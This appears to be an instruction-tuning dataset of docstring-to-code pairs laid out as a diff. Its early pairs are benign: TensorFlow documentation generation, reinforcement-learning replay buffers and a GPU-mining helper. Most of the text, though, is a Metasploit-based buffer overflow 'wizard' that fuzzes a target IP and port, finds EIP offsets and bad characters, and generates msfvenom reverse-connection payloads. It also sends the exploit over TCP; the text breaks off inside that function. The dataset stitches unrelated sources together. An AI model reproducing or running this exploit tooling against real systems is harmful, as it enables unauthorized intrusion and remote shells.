+Check the docstring of that function to confirm if the function was
+indeed deprecated. If a different deprecation setting was used on the
+function, then "THIS FUNCTION IS DEPRECATED" substring won't be inserted
+into the docstring of that function by the decorator.. [/INST] def _is_deprecated(self, api_node: doc_generator_visitor.ApiTreeNode):
+ if doc_controls.is_deprecated(api_node.py_object):
+ return True
+ decorator_list = signature.extract_decorators(api_node.py_object)
+ if any('deprecat' in dec for dec in decorator_list):
+ docstring = getattr(api_node.py_object, '__doc__') or ''
+ return 'THIS FUNCTION IS DEPRECATED' in docstring
+ return False
+[INST] For top-level modules, place the submodules as peers.. [/INST] def _flat_module_entries(self,
+ api_node: doc_generator_visitor.ApiTreeNode,
+ title: Optional[str] = None) -> List[Section]:
+ title = title or api_node.short_name
+ overview = self._make_link(api_node, title='Overview')
+ entries = []
+ submodule_sections = []
+ for name, child_node in api_node.children.items():
+ if child_node.obj_type is obj_type_lib.ObjType.MODULE:
+ subtitle = f'{title}.{name}'
+ submodule_sections.append(
+ self._make_section(child_node, title=subtitle))
+ else:
+ entries.extend(self._entries_from_api_node(child_node))
+ entries = sorted(entries, key=self._section_order_key)
+ entries.insert(0, overview)
+ submodule_sections = sorted(submodule_sections, key=self._section_order_key)
+ status = self._make_status(api_node)
+ module_section = Section(title=title, section=entries, status=status)
+ return [module_section] + submodule_sections
+[INST] Write previously extracted docs to disk.
+Write a docs page for each symbol included in the indices of parser_config to
+a tree of docs at `output_dir`.
+
+Symbols with multiple aliases will have only one page written about
+them, which is referenced for all aliases.. [/INST] def write_docs(
+ *,
+ output_dir: Union[str, pathlib.Path],
+ parser_config: config.ParserConfig,
+ yaml_toc: Union[bool, Type[toc_lib.TocBuilder]],
+ root_module_name: str,
+ root_title: str = 'TensorFlow',
+ search_hints: bool = True,
+ site_path: str = 'api_docs/python',
+ gen_redirects: bool = True,
+ gen_report: bool = True,
+ extra_docs: Optional[Dict[int, str]] = None,
+ page_builder_classes: Optional[docs_for_object.PageBuilderDict] = None,
+):
+ output_dir = pathlib.Path(output_dir)
+ site_path = pathlib.Path('/', site_path)
+ if not output_dir.is_absolute():
+ raise ValueError("'output_dir' must be an absolute path.\n"
+ f" output_dir='{output_dir}'")
+ output_dir.mkdir(parents=True, exist_ok=True)
+ redirects = []
+ api_report = None
+ if gen_report:
+ api_report = utils.ApiReport()
+ num_docs_output = 0
+ for api_node in parser_config.api_tree.iter_nodes():
+ full_name = api_node.full_name
+ if api_node.output_type() is api_node.OutputType.FRAGMENT:
+ continue
+ try:
+ page_info = docs_for_object.docs_for_object(
+ api_node=api_node,
+ parser_config=parser_config,
+ extra_docs=extra_docs,
+ search_hints=search_hints,
+ page_builder_classes=page_builder_classes)
+ if api_report is not None and not full_name.startswith(
+ ('tf.compat.v', 'tf.keras.backend', 'tf.numpy',
+ 'tf.experimental.numpy')):
+ api_report.fill_metrics(page_info)
+ except Exception as e:
+ raise ValueError(
+ f'Failed to generate docs for symbol: `{full_name}`') from e
+ path = output_dir / parser.documentation_path(full_name)
+ try:
+ path.parent.mkdir(exist_ok=True, parents=True)
+ path.write_text(page_info.page_text, encoding='utf-8')
+ num_docs_output += 1
+ except OSError as e:
+ raise OSError('Cannot write documentation for '
+ f'{full_name} to {path.parent}') from e
+ duplicates = parser_config.duplicates.get(full_name, [])
+ if not duplicates:
+ continue
+ duplicates = [item for item in duplicates if item != full_name]
+ if gen_redirects:
+ for dup in duplicates:
+ from_path = site_path / dup.replace('.', '/')
+ to_path = site_path / full_name.replace('.', '/')
+ redirects.append({'from': str(from_path), 'to': str(to_path)})
+ if api_report is not None:
+ api_report.write(output_dir / root_module_name / 'api_report.pb')
+ if num_docs_output <= 1:
+ raise ValueError('The `DocGenerator` failed to generate any docs. Verify '
+ 'your arguments (`base_dir` and `callbacks`). '
+ 'Everything you want documented should be within '
+ '`base_dir`.')
+ if yaml_toc:
+ if isinstance(yaml_toc, bool):
+ yaml_toc = toc_lib.FlatModulesTocBuilder
+ toc = yaml_toc(site_path).build(parser_config.api_tree)
+ toc_path = output_dir / root_module_name / '_toc.yaml'
+ toc.write(toc_path)
+ if redirects and gen_redirects:
+ redirects_dict = {
+ 'redirects': sorted(redirects, key=lambda redirect: redirect['from'])
+ }
+ api_redirects_path = output_dir / root_module_name / '_redirects.yaml'
+ with open(api_redirects_path, 'w') as redirect_file:
+ yaml.dump(redirects_dict, redirect_file, default_flow_style=False)
+ with open(output_dir / root_module_name / 'all_symbols.md', 'w') as f:
+ global_index = parser.generate_global_index(
+ root_title, parser_config.index, parser_config.reference_resolver)
+ if not search_hints:
+ global_index = 'robots: noindex\n' + global_index
+ f.write(global_index)
+[INST] Returns a random sample from the buffer.
+Parameters
+
+batch_size : int
+The number of observations to sample.. [/INST] def sample(self, batch_size):
+ return sample(self.memory, batch_size)
+[INST] Adds a transition to the buffer and add an initial prioritization.
+Parameters
+
+args
+The state, action, reward, next_state, done tuple. [/INST] def append(self, *args, **kwargs):
+ idx = self.position
+ super().append(*args, **kwargs)
+ self._it_sum[idx] = self._max_priority ** self._alpha
+ self._it_min[idx] = self._max_priority ** self._alpha
+[INST] Sample a batch of experiences.
+while returning importance weights and idxes
+of sampled experiences.
+
+Parameters
+
+int
+How many transitions to sample.
+beta: float
+To what degree to use importance weights
+(0 - no corrections, 1 - full correction)
+
+Returns
+
+np.array
+Array of shape (batch_size,) and dtype np.float32
+denoting importance weight of each sampled transition
+idxes: np.array
+Array of shape (batch_size,) and dtype np.int32
+idexes in buffer of sampled experiences. [/INST] def sample(self, batch_size, beta):
+ assert beta > 0
+ idxes = self._sample_proportional(batch_size)
+ weights = []
+ p_min = self._it_min.min() / self._it_sum.sum()
+ max_weight = (p_min * len(self.memory)) ** (-beta)
+ for idx in idxes:
+ p_sample = self._it_sum[idx] / self._it_sum.sum()
+ weight = (p_sample * len(self.memory)) ** (-beta)
+ weights.append(weight / max_weight)
+ weights = np.array(weights)
+ encoded_sample = tuple(zip(*self._encode_sample(idxes)))
+ batch = list(zip(*encoded_sample, weights, idxes))
+ return batch
+[INST] Update priorities of sampled transitions.
+sets priority of transition at index idxes[i] in buffer
+to priorities[i].
+
+Parameters
+
+[int]
+List of idxes of sampled transitions
+priorities: [float]
+List of updated priorities corresponding to
+transitions at the sampled idxes denoted by
+variable `idxes`.. [/INST] def update_priorities(self, idxes, priorities):
+ assert len(idxes) == len(priorities)
+ priorities += np.finfo('float').eps
+ for idx, priority in zip(idxes, priorities):
+ if priority < 0:
+ priority = np.finfo('float').eps
+ assert 0 <= idx < len(self.memory)
+ self._it_sum[idx] = priority ** self._alpha
+ self._it_min[idx] = priority ** self._alpha
+ self._max_priority = max(self._max_priority, priority)
+[INST] Forcing gradients to stay within a certain interval
+by setting it to the bound if it goes over it.
+
+Parameters
+
+x : number > 0
+Sets the interval to be [-x, x]. [/INST] def clamp_gradients(self, x=1):
+ assert x > 0
+ for param in self.model.parameters():
+ param.grad.data.clamp_(-x, x)
+[INST] Clears out gradients held in the model.. [/INST] def zero_grad(self):
+ self.model.zero_grad()
+[INST] Run a step of the optimizer on `model`.. [/INST] def step(self):
+ self.optimizer.step()
+[INST] Calculate gradients by shifting parameters
+towards the networks with the highest fitness value.
+
+This is calculated by evaluating the fitness of multiple
+networks according to the fitness function specified in
+the class.. [/INST] def calc_gradients(self, *args):
+ white_noise_dict, noise_dict = self._generate_noise_dicts()
+ candidate_solutions = self._generate_candidate_solutions(noise_dict)
+ fitness_values = torch.tensor(
+ [self.fitness(x, *args) for x in candidate_solutions],
+ device=self.device
+ )
+ if log.enabled:
+ log.Logger[self.name + "/" + "fitness_value"].append(fitness_values.mean().item())
+ fitness_values = (fitness_values - fitness_values.mean()) / (fitness_values.std() + np.finfo('float').eps)
+ self.zero_grad()
+ for name, param in self.model.named_parameters():
+ if param.requires_grad:
+ noise_dim_n = len(white_noise_dict[name].shape)
+ dim = np.repeat(1, noise_dim_n - 1).tolist() if noise_dim_n > 0 else []
+ param.grad = (white_noise_dict[name] * fitness_values.float().reshape(self.population_size, *dim)).mean(0) / self.sigma
+[INST] Perform a full state sync with the originating model.. [/INST] def sync(self):
+ self.target_model.load_state_dict(self.model.state_dict())
+[INST] Partially move closer to the parameters of the originating
+model by updating parameters to be a mix of the
+originating and the clone models.
+
+Parameters
+
+tau : number
+A number between 0-1 which indicates
+the proportion of the originator and clone in the new clone.. [/INST] def partial_sync(self, tau):
+ assert isinstance(tau, float)
+ assert 0.0 < tau <= 1.0
+ model_state = self.model.state_dict()
+ target_state = self.target_model.state_dict()
+ for grad_index, grad in model_state.items():
+ target_state[grad_index].copy_((1 - tau) * target_state[grad_index] + tau * grad)
+ self.target_model.load_state_dict(target_state)
+[INST] Adds a log-based probability to the observation.. [/INST] def append_log_probs(self, logprob):
+ self.log_probs.append(logprob)
+[INST] Clears the transitions and log-based probabilities.. [/INST] def clear(self):
+ self.memory.clear()
+ self.log_probs.clear()
+[INST] Return a list of the transitions with their
+associated log-based probabilities.. [/INST] def recall(self):
+ if len(self.memory) != len(self.log_probs):
+ raise ValueError("Memory and recorded log probabilities must be the same length.")
+ return list(zip(*tuple(zip(*self.memory)), self.log_probs))
+[INST] None
+Prompt user to set up commands for mining on their machine. [/INST] def mine():
+ try:
+ mining_path = os.path.expanduser('~/.vectordash/mining/mine.sh')
+ pid_path = os.path.expanduser('~/.vectordash/mining/pid')
+ if os.path.exists(mining_path):
+ subprocess.call("chmod +x " + mining_path, shell=True)
+ process = subprocess.Popen(mining_path)
+ pid_file = open(pid_path, 'w')
+ pid_file.write(str(process.pid))
+ pid_file.close()
+ else:
+ print("Please run " + stylize("vdhost setcommands", fg("blue")) + " before trying to mine.")
+ except Exception as e:
+ print(stylize("The following error was thrown: ", fg("red")) + str(e))
+ print(stylize("Your mining commands could not be executed. Are you sure you are using absolute paths?",
+ fg("red")))
+[INST] None
+Prompt user to set up commands for mining on their machine. [/INST] def stop():
+ try:
+ pid_path = os.path.expanduser('~/.vectordash/mining/pid')
+ if os.path.exists(pid_path):
+ pid_file = open(pid_path, 'r')
+ pid = pid_file.read()
+ pid_file.close()
+ if int(pid) < 0:
+ print("Not currently mining. Run " + stylize("vdhost mine", fg("blue")) + " to start mining")
+ return
+ subprocess.call("kill -- -$(ps -o pgid= " + pid + " | grep -o [0-9]*)", shell=True)
+ while pid_exists(pid):
+ print("Attempting to force kill subprocess")
+ subprocess.call("kill -9 -p " + pid, shell=True)
+ pid_file = open(pid_path, 'w')
+ pid_file.write("-1")
+ pid_file.close()
+ else:
+ print("Please run " + stylize("vdhost mine", fg("blue")) + " before trying to stop mining.")
+ return
+ except ValueError as e:
+ print(stylize("The following error was thrown: ", fg("red")) + str(e))
+ print(stylize("Your mining commands could not be executed. Are you sure you are using absolute paths?",
+ fg("red")))
+[INST] Check whether pid exists in the current process table.
+UNIX only.. [/INST] def pid_exists(pid):
+ try:
+ print("Double-checking to ensure process was killed")
+ os.kill(int(pid), 0)
+ except OSError:
+ print("pid: " + pid + " killed")
+ return False
+ else:
+ print("pid: " + pid + " still exists")
+ return True
+[INST] Checks if all required binaries are available. [/INST] def check_dependencies():
+ dependencies = ['msf-pattern_create', 'msf-pattern_offset', 'msfvenom']
+ deps_ok = True
+ for dep in dependencies:
+ try:
+ sub.call(dep, stdout=sub.DEVNULL, stderr=sub.DEVNULL)
+ except OSError:
+ deps_ok = False
+ print_error('Missing binary: {}'.format(dep))
+ if not deps_ok:
+ print_info('You need to install the Metasploit Framework')
+ return deps_ok
+[INST] Prints a welcome message to the screen. [/INST] def print_welcome():
+ print('''{}
+ ╔═╗┬┌┬┐┌─┐┬ ┌─┐
+ ╚═╗││││├─┘│ ├┤
+ ╚═╝┴┴ ┴┴ ┴─┘└─┘
+ ▄▄▄▄ ▒█████
+ ▓█████▄ ▒██▒ ██▒
+ ▒██▒ ▄██▒██░ ██▒
+ ▒██░█▀ ▒██ ██░
+ ░▓█ ▀█▓░ ████▓▒░
+ ░▒▓███▀▒░ ▒░▒░▒░
+ ▒░▒ ░ ░ ▒ ▒░
+ ░ ░ ░ ░ ░ ▒ *
+ ░ ░ ░ *°
+ *°`
+ ╦ ╦┬┌─┐┌─┐┬─┐┌┬┐ *°``
+ ║║║│┌─┘├─┤├┬┘ ││ (´***°``)
+ ╚╩╝┴└─┘┴ ┴┴└──┴┘ ```*´´´
+ This wizards helps you getting
+started with simple buffer overflows.
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~{}
+'''.format(CYAN, FORMAT_END))
+[INST] Prints the buffer overflow types to the screen and stores the users selection. [/INST] def select_bo_type():
+ show_prompt_text('Select type of buffer overflow:')
+ show_prompt_text('[ L ] Local buffer overflow', False)
+ show_prompt_text(' {} = Open a malicious file in an application {}'.format(GRAY, FORMAT_END), False)
+ show_prompt_text('[ R ] Remote buffer overflow', False)
+ show_prompt_text(' {} = Send a malicious request via TCP to an application {}'.format(GRAY, FORMAT_END), False)
+ user_input = get_input(bo_type_valid)
+ global bo_type
+ bo_type = 'local' if user_input in ['l', 'loc', 'local'] else 'remote'
+[INST] We will increasing payloads and send them to the application to find out at which length a buffer overflow occurs. [/INST] def step_fuzzing():
+ global current_step
+ current_step = 0
+ show_step_banner('[0] Fuzzing')
+ if bo_type == 'local':
+ show_prompt_text('Enter file extension:')
+ user_input = get_input(ext_valid)
+ global file_ext
+ global file
+ file_ext = user_input
+ file = file_name + '.' + file_ext if file_ext else file_name
+ print('\n{} files with increasing size will be generated. The following settings will be used:\n'.format(
+ fuzz_buff_length))
+ settings = [desc_file_ext(), desc_fuzz_buff_length(), desc_fuzz_char(), desc_increase_step(),
+ desc_start_command(), desc_end_command()]
+ elif bo_type == 'remote':
+ show_prompt_text('Enter target IP:')
+ user_input = get_input(ip_valid)
+ global target
+ target = user_input
+ show_prompt_text('Enter target port:')
+ user_input = get_input(port_valid)
+ global port
+ port = int(user_input)
+ print('\nA fuzzing file will be generated. The following settings will be used:\n')
+ settings = [desc_target(), desc_port(), desc_fuzz_buff_length(), desc_fuzz_char(),
+ desc_increase_step(), desc_start_command(), desc_end_command()]
+ show_settings(settings)
+ if proceed_ok():
+ if bo_type == 'local':
+ dump_local_fuzz()
+ elif bo_type == 'remote':
+ dump_remote_fuzz()
+ run_remote_fuzzing()
+ step_pattern()
+[INST] Based on the buffer length determined through fuzzing (previous step), we will create and send
+a unique pattern which will help us finding the offset. [/INST] def step_pattern():
+ global current_step
+ current_step = 1
+ show_step_banner('[1] Finding offset')
+ show_prompt_text('Enter the length at which the application/service crashed:')
+ user_input = get_input(number_valid)
+ global pattern_length
+ pattern_length = int(user_input) - len(start_command) - len(end_command)
+ global buf_length
+ buf_length = int(user_input)
+ tmp_file = 'pattern.txt'
+ command = 'msf-pattern_create -l {} > {}'.format(pattern_length, tmp_file)
+ thread = call_command(command)
+ while thread.running():
+ animation('Creating pattern')
+ if thread.result() == 0:
+ print()
+ with open(tmp_file, 'r') as f:
+ pattern = f.read().splitlines()[0].encode()
+ global buffer
+ buffer = buffer_list.get_buffer_by_name('pattern').get_buffer(pattern)
+ os.unlink(tmp_file)
+ print('The exploit file will be generated. The following settings will be used:\n')
+ if bo_type == 'local':
+ settings = [desc_pattern(), desc_start_command(), desc_end_command()]
+ show_settings(settings)
+ if proceed_ok():
+ dump_local_exploit()
+ print(' Load file into vulnerable application and check which pattern is shown in EIP on crash.')
+ elif bo_type == 'remote':
+ settings = [desc_target(), desc_port(), desc_pattern(), desc_start_command(), desc_end_command()]
+ show_settings(settings)
+ if proceed_ok():
+ dump_remote_exploit()
+ run_remote_exploit()
+ step_offsets()
+[INST] In the offset step, the user enters the value that overwrites EIP.
+By comparing this value to the pattern (previous step), the offset can be determined.
+We will then build a custom payload that places Bs in the EIP.
+The user must then check in the debugger whether the offset has been calculated properly.. [/INST] def step_offsets():
+ global current_step
+ current_step = 2
+ show_step_banner('[2] Checking offsets')
+ show_prompt_text('Enter the 8 characters that are shown in the EIP:')
+ user_input = get_input(pattern_valid)
+ tmp_file = 'offset.txt'
+ command = 'msf-pattern_offset -q {} > {}'.format(shlex.quote(user_input), tmp_file)
+ thread = call_command(command)
+ while thread.running():
+ animation('Finding offset')
+ if thread.result() == 0:
+ print()
+ with open(tmp_file, 'r') as f:
+ result = f.read()
+ try:
+ global offset
+ offset = int(result.split(' ')[-1])
+ print_info('Offset at ' + str(offset))
+ except (ValueError, IndexError):
+ print_error('Could not find string in pattern. Maybe the exploit did not work?')
+ print_info('You could return to step [1] and try increasing the length.')
+ os.unlink(tmp_file)
+ valid_step = False
+ while not valid_step:
+ show_prompt_text('With which step do you want to proceed?')
+ user_input = get_input(number_valid)
+ if set_step(user_input):
+ valid_step = True
+ os.unlink(tmp_file)
+ show_prompt_text('Enter the 8 characters that are shown at the top of stack:')
+ user_input = get_input(pattern_valid)
+ tmp_file = 'offset.txt'
+ command = 'msf-pattern_offset -q {} > {}'.format(shlex.quote(user_input), tmp_file)
+ thread = call_command(command)
+ while thread.running():
+ animation('Finding offset')
+ if thread.result() == 0:
+ print()
+ with open(tmp_file, 'r') as f:
+ result = f.read()
+ try:
+ stack_offset = int(result.split(' ')[-1])
+ print_info('Offset at ' + str(stack_offset))
+ global nop_sled
+ off_stack_dist = stack_offset - offset
+ if off_stack_dist > nop_sled:
+ nop_sled = off_stack_dist
+ except (ValueError, IndexError):
+ print_info('Could not find string in pattern. '
+ 'Seems that the overflow did not overwrite the stack. We will deal with that later.')
+ os.unlink(tmp_file)
+ global buffer
+ buffer = buffer_list.get_buffer_by_name('generic').get_buffer()
+ if bo_type == 'local':
+ dump_local_exploit()
+ elif bo_type == 'remote':
+ update_remote_exploit()
+ run_remote_exploit()
+ print(
+ ' Does the EIP show 42424242? If not, something is wrong with the offset and you should repeat the previous steps.')
+ print_info('Write the address down where the Cs start. You can use it later to find bad characters with mona.')
+ if proceed_ok():
+ step_badchars()
+[INST] In the badchar step an ASCII string is repeatedly passed as payload.
+The user has to examine the result in a debugger and enter the characters that break the exploit.
+These characters are stored and will be considered later when creating the real payload.. [/INST] def step_badchars():
+ global current_step
+ current_step = 3
+ show_step_banner('[3] Finding bad characters')
+ print_info('You must probably repeat this step multiple times until you have found all bad characters.')
+ print('''{}
+ In Immunity Debugger, you can use mona to find the bad characters. To do so, do the following before running the exploit:
+ 1. Set up working directory: !mona config -set workingfolder c:\\mona\\%p
+ 2. Create byte array: !mona bytearray
+ {}'''.format(GRAY, FORMAT_END))
+ all_chars_found = False
+ while not all_chars_found:
+ global buffer
+ buffer = buffer_list.get_buffer_by_name('badcharc').get_buffer()
+ if bo_type == 'local':
+ dump_local_exploit()
+ elif bo_type == 'remote':
+ update_remote_exploit()
+ run_remote_exploit()
+ print('\n Can you see all Cs when following ESP or EAX in dump (depending on where the Cs are stored)?')
+ print('''{}
+ In Immunity Debugger, you can use mona to find the bad characters.
+ To do so, do the following before resending the exploit:
+ 1. Compare: !mona compare -f c:\\mona\\\\bytearray.bin -a
+ 2. Recreate byte array: !mona bytearray -cpb "{}"
+ {}'''.format(GRAY, '\\x' + '\\x'.join(c for c in badchars), FORMAT_END))
+ show_prompt_text('Enter the character (e.g. 00, 0a, 0d) which does not show up or breaks the exploit')
+ show_prompt_text('To show all possible ascii characters enter {}show ascii{}'.format(BOLD, FORMAT_END))
+ show_prompt_text('Leave empty / press Enter when there a no more bad characters.')
+ user_input = get_input(bad_char_valid)
+ if user_input == '':
+ all_chars_found = True
+ else:
+ char = unhexlify(user_input)
+ global char_string
+ char_string = char_string.replace(char, b'')
+ badchars.append(user_input)
+ step_return()
+[INST] By examining the buffer overflow, we can determine where to put the payload and which command to use to access it. [/INST] def step_return():
+ global current_step
+ current_step = 4
+ show_step_banner('[4] Finding return address')
+ show_prompt_text('Examine the buffer overflow in the debugger. Which case does apply?')
+ buf_types = buffer_list.get_selectable_buffers()
+ for b in buf_types:
+ show_prompt_text('[ ' + str(b.id) + ' ] ' + b.select_text, False)
+ while True:
+ user_input = int(get_input(number_valid))
+ if 0 <= user_input < len(buf_types):
+ break
+ print_warning('The number you entered is invalid')
+ selected = buffer_list.get_buffer_by_id(user_input)
+ selected.get_input()
+ global buffer
+ buffer = selected.get_buffer()
+ if bo_type == 'local':
+ dump_local_exploit()
+ elif bo_type == 'remote':
+ update_remote_exploit()
+ run_remote_exploit()
+ print(' Check if everything is where it should be. If not, repeat previous steps.')
+ if proceed_ok():
+ step_payload()
+[INST] We define the type of payload we wish to send and create the final exploit file.. [/INST] def step_payload():
+ global current_step
+ current_step = 5
+ show_step_banner('[5] Creating payload')
+ global connect_ip
+ show_prompt_text('Enter your IP (hit Enter to use current value {}):'.format(connect_ip))
+ user_input = get_input(ip_valid)
+ if user_input != '':
+ connect_ip = user_input
+ global connect_port
+ show_prompt_text('Enter the port to listen on (hit Enter to use current value {}):'.format(connect_port))
+ user_input = get_input(port_valid)
+ if user_input != '':
+ connect_port = user_input
+ global arch
+ show_prompt_text('Enter the target architecture (hit Enter to use current value {}):'.format(arch))
+ user_input = get_input(arch_valid)
+ if user_input != '':
+ arch = 'x' + user_input
+ global platform
+ show_prompt_text('Enter the target platform (hit Enter to use current value {}):'.format(platform))
+ user_input = get_input(platform_valid)
+ if user_input != '':
+ platform = user_input
+ global payload
+ while True:
+ show_prompt_text('Enter payload type'.format(payload))
+ show_prompt_text('Show all available with {}show payloads{}'.format(BOLD, FORMAT_END))
+ user_input = get_input(payload_valid)
+ if user_input == 'show payloads':
+ show_payloads()
+ continue
+ else:
+ payload = user_input
+ payload_ok = create_payload()
+ if payload_ok and bo_type == 'local':
+ dump_local_exploit()
+ elif payload_ok and bo_type == 'remote':
+ update_remote_exploit()
+ run_remote_exploit()
+ show_prompt_text('Did your exploit work? If not, try sending a different payload.')
+ show_prompt_text(
+ 'Enter {}again{} to try again. Hit Enter if everything worked fine.'.format(BOLD, FORMAT_END))
+ user_input = get_input(check_text)
+ if user_input == '':
+ break
+ else:
+ continue
+ get_input(generic_check)
+[INST] Creates a palyoad with msfvenom and updates the buffer. [/INST] def create_payload():
+ tmp_file = 'payload.py'
+ payload_size = buffer_list.selected_buffer.payload_size
+ command = "msfvenom -a {arch} --platform {plat} -p {pay} LHOST={host} LPORT={port} EXITFUNC=thread -s {size} -b '{bad}' -f py -v payld -o {file}".format(
+ arch=shlex.quote(arch),
+ plat=shlex.quote(platform),
+ pay=shlex.quote(payload),
+ host=connect_ip,
+ port=connect_port,
+ size=payload_size,
+ bad='\\x' + '\\x'.join(str(char) for char in badchars),
+ file=tmp_file)
+ print_info("Executing command: " + command)
+ thread = call_command(command)
+ while thread.running():
+ animation('Creating payload')
+ if thread.result() == 0:
+ print()
+ from payload import payld
+ global payload_code
+ payload_code = payld
+ shutil.rmtree('__pycache__', ignore_errors=True)
+ global buffer
+ buffer = buffer_list.selected_buffer.get_buffer()
+ print_info('Buffer has been updated with new payload')
+ if len(payload_code) > payload_size:
+ print_warning(
+ "The payload was generated as small as possible. However, it is larger than the specified payload size.\n"
+ "The exploit probably still works fine, but don't be surprised if problems occur.")
+ return True
+ else:
+ print('\n')
+ print_warning('Something went wrong when creating the payload. Check if you have entered a valid payload.')
+ print_info('To create a new payload use {}set payload {}'.format(BOLD, FORMAT_END))
+ return False
+[INST] Accepts certain string variants for local / remote. [/INST] def bo_type_valid(user_input):
+ if user_input in ['l', 'r', 'loc', 'rem', 'local', 'remote']:
+ return True
+ print_error("Invalid buffer overflow type. Only 'local' or 'remote' are possible.")
+ return False
+[INST] Accepts a string with a maximum length of 20 as file extension. [/INST] def ext_valid(user_input):
+ if user_input.startswith('.') or len(user_input) > 20 or ' ' in user_input:
+ return False
+ print_error("Invalid input. Enter the extension without preceding dot. Maximum length is 20.")
+ return True
+[INST] Accepts a string with a valid IP address. [/INST] def ip_valid(user_input):
+ if user_input == '':
+ return True
+ ip_regex = re.compile(
+ r'^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$')
+ return re.match(ip_regex, user_input)
+[INST] Accepts an integer within the number range for ports. [/INST] def port_valid(user_input):
+ if user_input == '':
+ return True
+ try:
+ port_no = int(user_input)
+ if 0 <= port_no <= 65535:
+ return True
+ else:
+ print_error("Invalid port number.")
+ return False
+ except ValueError:
+ print_error("Invalid port number.")
+ return False
+[INST] The Metasploit pattern is alphanumeric, so the EIP value as well. [/INST] def pattern_valid(user_input):
+ if len(user_input) == 8 and user_input.isalnum():
+ return True
+ print_error("Invalid pattern. The pattern mus be an 8-bit hex value.")
+ return False
+[INST] Accepts an alphanumeric value of length 2 or no input (= Enter). [/INST] def bad_char_valid(user_input):
+ if user_input == '':
+ return True
+ if len(user_input) == 2 and user_input.isalnum():
+ try:
+ int(user_input, 16)
+ return True
+ except ValueError:
+ return False
+ print_error("Invalid character. Enter the hex value: 00 0a etc.")
+ return False
+[INST] Accepts a memory location: 8-bit hex value. [/INST] def address_valid(user_input):
+ if len(user_input) == 8:
+ try:
+ int(user_input, 16)
+ return True
+ except ValueError:
+ return False
+ print_error("Invalid memory address. Must be an 3-bit hex value.")
+ return False
+[INST] Accepts a string matching the basic format 'platform/payload. [/INST] def payload_valid(user_input):
+ if len(user_input.split('/')) >= 2 or user_input == 'show payloads' or user_input == '':
+ return True
+ print_error("Invalid payload. Use 'show payloads' to show valid payloads.")
+ return False
+[INST] Msfvenom platforms are words with a maximum length of 10. [/INST] def platform_valid(user_input):
+ if (len(user_input) <= 10 and user_input.isalpha()) or user_input == '':
+ return True
+ print_error("Invalid platform type")
+ return False
+[INST] Accepts any string without numbers or special characters. [/INST] def check_text(user_input):
+ if user_input.isalpha() or user_input == '':
+ return True
+ print_error("Invalid input")
+ return False
+[INST] Requires the user to hit enter to proceed. [/INST] def proceed_ok():
+ show_prompt_text('Press Enter to proceed.')
+ if get_input(check_enter) == '':
+ return True
+ return False
+[INST] Prints the currently set values of all parameters. [/INST] def show_options():
+ dash = '-' * 77
+ header = ['Name', 'Current setting', 'Required', 'Description']
+ options = [
+ [
+ ['Global parameters'],
+ desc_bo_type(),
+ desc_start_command(),
+ desc_end_command()
+ ],
+ [
+ ['Local buffer overflow parameters'],
+ desc_file_name(),
+ desc_file_ext()
+ ],
+ [
+ ['Remote buffer overflow parameters'],
+ desc_target(),
+ desc_port()
+ ],
+ [
+ ['Fuzzing'],
+ desc_fuzz_buff_length(),
+ desc_increase_step(),
+ desc_fuzz_char()
+ ],
+ [
+ ['Buffer'],
+ desc_pattern(),
+ desc_buf_length(),
+ desc_offset(),
+ desc_badchars(),
+ desc_nop_sled(),
+ desc_nop_padding(),
+ desc_return_address()
+ ],
+ [
+ ['Payload'],
+ desc_payload(),
+ desc_arch(),
+ desc_platform(),
+ desc_connect_ip(),
+ desc_connect_port()
+ ]
+ ]
+ print(BOLD, GRAY)
+ print('{:<15s}{:<20}{:<15s}{:<30s}'.format(header[0], header[1], header[2], header[3]))
+ print(dash, FORMAT_END)
+ for item in options:
+ for index, value in enumerate(item):
+ if index == 0:
+ print(BOLD, GRAY)
+ print(value[0].upper(), FORMAT_END)
+ else:
+ print('{:<15s}{:<20}{:<15s}{:<30s}'.format(value[0], value[1], value[2], value[3]))
+ print('\n')
+[INST] Shows parameters and their currently set values. [/INST] def show_settings(settings):
+ header = ['Parameter', 'Current setting', 'Description']
+ print('{}{}{:<15s}{:<20}{:<30s}{}'.format(BOLD, GRAY, header[0], header[1], header[2], FORMAT_END))
+ for item in settings:
+ print('{}{:<15s}{:<20}{:<30s}{}'.format(GRAY, item[0], item[1], item[3], FORMAT_END))
+ print('\nIf you wish to change these settings, enter {}set {}\n'.format(BOLD, FORMAT_END))
+[INST] Displays all steps of the wizard and marks the currently selected step. [/INST] def show_steps():
+ print('\nThe wizard guides you through the following steps:')
+ steps = ['Fuzzing',
+ 'Send pattern to find offset for EIP',
+ 'Check offsets',
+ 'Check bad characters',
+ 'Check return address',
+ 'Create payload']
+ for index, value in enumerate(steps):
+ if index == current_step:
+ print('{}=>[{}] {} {}'.format(CYAN, index, value, FORMAT_END))
+ else:
+ print('{} [{}] {} {}'.format(GRAY, index, value, FORMAT_END))
+ print('The prompt shows your current step.')
+ print('You can switch between steps at any time with {}set step {}\n'.format(BOLD, FORMAT_END))
+[INST] Shows all payloads available in Metasploit based on the current values for architecture and platform. [/INST] def show_payloads():
+ tmp_file = 'payloads.txt'
+ command = 'msfvenom -l payloads > {}'.format(tmp_file)
+ thread = call_command(command)
+ while thread.running():
+ animation('Searching payloads in msfvenom')
+ if thread.result() == 0:
+ print()
+ with open(tmp_file, 'r') as f:
+ for line in f:
+ splitted = line.split(' ')
+ if len(splitted) > 5:
+ name = splitted[4]
+ if platform in name:
+ if arch == 'x86' and 'x64' not in name:
+ print(name)
+ elif arch == 'x64' and 'x86' not in name:
+ print(name)
+ os.unlink(tmp_file)
+[INST] Shows all ASCII characters in a matrix (helps finding bad chars). [/INST] def show_ascii():
+ hexed = char_string.hex()
+ listed = [hexed[i:i + 2] for i in range(0, len(hexed), 2)]
+ cols = 16
+ lines = (" ".join(listed[i:i + cols]) for i in range(0, len(listed), cols))
+ print('\n')
+ print('\n'.join(lines))
+[INST] Asks the user if the remote exploit should be run automatically. [/INST] def run_remote_exploit():
+ show_prompt_text('You can check and run the exploit file manually or press Enter to let the wizard run it.')
+ show_prompt_text('Enter "skip" to proceed without running the file.', False)
+ if get_input(check_text) == 'skip':
+ return
+ else:
+ send_exploit()
+[INST] Sends a request with the payload for a remote buffer overflow. [/INST] def send_exploit():
+ try:
+ with so.socket(so.AF_INET, so.SOCK_STREAM) as s:
+ s.settimeout(5)
+ print_info('Connecting to {}'.format(target))
+ connect = s.connect_ex((target, port))
+ if connect != 0:
